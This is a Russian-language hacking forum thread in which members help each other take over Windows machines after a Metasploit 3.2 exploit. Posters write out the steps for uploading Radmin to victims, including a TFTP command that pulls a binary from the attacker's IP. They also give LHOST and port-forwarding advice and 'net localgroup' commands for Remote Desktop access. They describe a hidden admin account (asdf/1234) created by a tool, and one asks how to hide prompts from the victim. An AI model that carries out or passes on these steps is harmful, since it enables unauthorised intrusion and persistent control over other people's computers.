Статьи Дедик или поможет нам Metasploit 3.2

Discussion in 'Статьи' started by stopxaker, 5 Jan 2009.

  1. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    а как можно получить тогда акк ?
     
  2. dyExplode

    dyExplode Elder - Старейшина

    Joined:
    13 Jan 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    0
    при помощи радмина и terminal.exe
     
  3. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    tasklist не работает пишит tasklist is not recognized as an internal or external command, operable program or batch file. как тогда узнать заюзан радмин или нет ?:)
     
  4. dyExplode

    dyExplode Elder - Старейшина

    Joined:
    13 Jan 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    0
    ну например посмотреть в радмин вьювере через несколько минут идёт подключение или нет. и второй способ с помощью команды
    Code:
    dir
    можно посмотреть распаковался ли r_server.exe если распаковался то значит и запустился.
     
  5. herfleisch

    herfleisch Elder - Старейшина

    Joined:
    7 Jan 2009
    Messages:
    579
    Likes Received:
    203
    Reputations:
    13
    Насколько я понял, без внешнего IP в инете пытаться использовать уязвимость даже и не стоит пытаться?
     
  6. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    а у меня вот незнаю с какого черта не запускается радмин у клиента.
    скачаю, потом пишу там:
    sys.exe
    выполняется без ошибки, но ничего не появляется в tasklist_е. (вювер точно ничего не видет)
    в чем может быть дела? кстати, при передачи радмина в логах ftfp пишется:
    Или какая защита не может разрешить запустки sys.exe ?
     
  7. dyExplode

    dyExplode Elder - Старейшина

    Joined:
    13 Jan 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    0
    проверь есть ли Твой sys.exe в папке куда Ты Его качал. если Ты использовал tftp то в tftp файл передаётся не в двоичном формате а по символам при этом экзешники могут портиться для принудительного включения двоичного режима заюзай ключ -i. при использованиее ftp таких проблем недолжно возникать.
     
    1 person likes this.
  8. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    dyExplode

    ну вот, мен тоже кажется, что пожет повредился.
    теперь как писать правильно?
    tftp -i мой_IP get sys.exe
    так?

    P.S. да, ты прав, надо было с ключем -i отпарвить.
    спасибо +!
     
    #268 B1t.exe, 11 Jan 2009
    Last edited: 11 Jan 2009
  9. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    да верно , как решить данную проблему "интерактивный вход в систему на данном компьютере запрещен локальной политикой" уже как не добавлял юзера не получается , вот тут решение но через меню пуск http://support.microsoft.com/kb/289289/ru?spid=3198&sid=global , как ето сделать через смд или радмин(радмин от компа не уходит)
     
  10. NiGHt-LEshiY

    NiGHt-LEshiY Elder - Старейшина

    Joined:
    15 Nov 2006
    Messages:
    46
    Likes Received:
    4
    Reputations:
    0
    .
     
    #270 NiGHt-LEshiY, 11 Jan 2009
    Last edited: 27 Sep 2015
  11. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    извеняюсь внешний ип это динамический ? если динам вписуеш его в LHOST : tge local adress и юзаеш эксплойт
     
  12. Lamia

    Lamia Elder - Старейшина

    Joined:
    11 Jul 2007
    Messages:
    186
    Likes Received:
    77
    Reputations:
    -9
    Ага!Если ты не за натом,в противном случае тебе придётся форвардить порт!После чего можеш проверить
    например вот тут!http://whatsmyip.org/ports/
     
    #272 Lamia, 11 Jan 2009
    Last edited: 11 Jan 2009
  13. NiGHt-LEshiY

    NiGHt-LEshiY Elder - Старейшина

    Joined:
    15 Nov 2006
    Messages:
    46
    Likes Received:
    4
    Reputations:
    0
    .
     
    #273 NiGHt-LEshiY, 11 Jan 2009
    Last edited: 27 Sep 2015
  14. dyExplode

    dyExplode Elder - Старейшина

    Joined:
    13 Jan 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    0
    stopxaker уже писал
    для англоязычной венды
    Code:
    net localgroup "Remote Desktop Users" user /add
    для рускоязычной
    Code:
    net localgroup "пользователи удаленного рабочего стола" user /add
    но вроде как всё эти проблемы должен решать terminal.exe
     
  15. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    dyExplode

    А termnal.exe еще и учетка создает и еще прописыват группы? я думал только патчит TCP/IP. а тогда скажи, какая учета создает и с каким паролем?
     
  16. dyExplode

    dyExplode Elder - Старейшина

    Joined:
    13 Jan 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    0
    по умолчанию user:asdf пасворд:1234
    но при желаниии можно изменить в файле run.cmd и заново упаковать. также придётся подредактировать файл для использования в английской венде.
     
    #276 dyExplode, 11 Jan 2009
    Last edited: 11 Jan 2009
  17. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    учётка будет со скрытым админом : asdf пароль 1234 ;)
     
    1 person likes this.
  18. xlife

    xlife New Member

    Joined:
    4 Jan 2009
    Messages:
    20
    Likes Received:
    4
    Reputations:
    0
    используя terminal.exe - пользователя спрашивает о замене оригинальных файлов винды :confused: ,
    как это скрыть от пользователя?!

    П.С. под 2003xp существуют подобные статьи?
     
  19. dyExplode

    dyExplode Elder - Старейшина

    Joined:
    13 Jan 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    0
    Ты немного темой ошибся! тема про terminal.exe вот сдесь https://forum.antichat.ru/threadnav99665-1-10.html и учись юзать поиск возможно ответ на Твой вопрос уже есть на форуме.
     
  20. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    Такой ОС не существует ;)